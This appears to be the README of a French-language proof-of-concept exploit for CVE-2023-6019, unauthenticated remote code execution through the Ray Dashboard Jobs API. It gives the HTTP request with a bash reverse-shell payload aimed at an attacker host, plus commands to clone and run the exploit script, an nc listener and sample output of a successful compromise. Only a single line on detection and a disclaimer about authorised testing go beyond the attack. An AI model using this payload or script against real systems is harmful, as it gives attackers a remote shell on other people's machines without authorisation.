
Exploit PoC pour CVE-2023-6019 ciblant l'exécution de code à distance non authentifiée dans Anyscale Ray Dashboard via l'API Jobs. Fournit un shell inversé sur les instances Ray vulnérables (< 2.6.4).
PoC d'exploit pour CVE-2023-6019 — Exécution de code à distance via l'API Jobs non authentifiée de Ray Dashboard.
Réalisé par oguiii
Anyscale Ray est un framework open-source pour les charges de travail d’IA/ML distribuées. Les versions antérieures à 2.6.4 exposent une API de soumission de Jobs via le tableau de bord Ray (port par défaut 8265) sans aucune authentification, permettant à un attaquant non authentifié de soumettre des tâches arbitraires et d’obtenir une exécution de code à distance sur l’hôte.
Le point de terminaison /api/jobs/ accepte une charge utile JSON avec un champ entrypoint qui est exécuté comme une commande shell par le processus worker Ray – aucune identification requise.
POST /api/jobs/ HTTP/1.1
Host: <cible>:8265
Content-Type: application/json
{
"entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTAQUANT/PORT 0>&1'",
"runtime_env": {},
"job_id": null,
"metadata": {}
}
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <IP_CIBLE> -p <PORT> -l <LHOST> -lp <LPORT>
| Option | Description | Défaut |
|---|---|---|
-t | IP ou nom d’hôte de la cible | requis |
-p | Port du tableau de bord Ray | 8265 |
-l | IP de l’attaquant (reverse shell) | requis |
-lp | Port de l’attaquant (reverse shell) | requis |
# Démarrer l’écouteur
nc -lvnp 4444
# Lancer l’exploit
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444
[*] Vérification de la version Ray sur 192.168.1.100:8265...
[*] Version de l’API Ray : 4
[*] Version Ray : 2.6.3
[+] VULNÉRABLE ! Ray 2.6.3 est affecté par CVE-2023-6019
[*] Cible : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Soumission de la tâche...
[+] Tâche soumise avec succès !
[+] ID de la tâche : raysubmit_Gztg89LZuTa8Jevc
[>] Assurez-vous que votre écouteur est prêt :
nc -lvnp 4444
Recherchez les requêtes POST non attendues vers /api/jobs/ sur le port 8265 dans vos journaux HTTP ou le trafic réseau.
Cet outil est destiné uniquement aux tests de pénétration autorisés et à des fins éducatives.
L’auteur n’est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.
Obtenez toujours une autorisation écrite appropriée avant de tester.